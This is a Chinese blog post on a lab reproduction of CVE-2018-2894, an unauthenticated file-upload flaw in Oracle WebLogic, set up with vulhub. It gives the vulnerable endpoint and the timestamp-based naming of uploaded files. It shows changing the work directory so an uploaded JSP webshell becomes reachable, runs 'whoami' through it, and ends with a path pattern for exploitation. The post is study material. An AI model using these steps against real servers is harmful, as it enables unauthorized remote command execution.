漏洞复现 CVE-2018-2894 weblogic文件上传

文章详细描述了利用WebLogic服务器CVE-2018-2894漏洞进行未授权文件上传的过程,包括靶场搭建、文件上传路径、工作目录设置以及如何通过修改WorkHomeDir访问上传文件。作者提到,尽管文件名被重命名,但通过控制时间戳和选择可访问的目录(如/images/),可以实现对上传文件的访问。文章末尾提供了利用路径的模式。
摘要由CSDN通过智能技术生成

vulhub weblogic CVE-2018-2894

1、 搭建好靶场,按提示访问 http://192.168.137.157:7001/console
在这里插入图片描述
按照给出的文档,会查看容器的日志,找到管理员用户名/密码为 weblogic / h3VCmK2L,暂时用不到,不需要登录
在这里插入图片描述

2、未授权访问,http://192.168.137.157:7001/ws_utc/config.do,这里存在一个任意文件上传的接口
在这里插入图片描述
没有做其他操作,主要我好奇它把文件上传到哪去了
在这里插入图片描述
/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir/config/keystore/1685608640016_ma.jsp

在这里插入图片描述

可以看到,上传文件被重命名了,加了一串前缀字符,抓包之后发现是时间戳,从响应包中可以得到,至此文件名已被掌控,关键还有一个路径怎么解决?
下划线部分的这个路径在网站中也是可以自定义的

在这里插入图片描述
设置Work Home Dir为 /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css 。这个目录是ws_utc应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要。

与css同级的目录:META-INF WEB-INF css images js
我试了一下,images目录也可以用,js目录不行

访问 http://192.168.137.157:7001/ws_utc/images/config/keystore/1685608640016_ma.jsp?pwd=666&&i=whoami
在这里插入图片描述

总结

上传的所有文件全路径格式都是/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir/config/keystore/时间戳_filename.jsp

但是在 http://192.168.137.157:7001/ws_utc/config.do设置当前工作目录Work Home Dir之后,上传文件的路径没有改变,却能够访问了

写的很浅,具体的漏洞原理我还没有去看,有时间补

利用路径:/ws_utc/[Work Home Dir设置的目录的最后一级目录名]/config/keystore/时间戳_filename.jsp

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值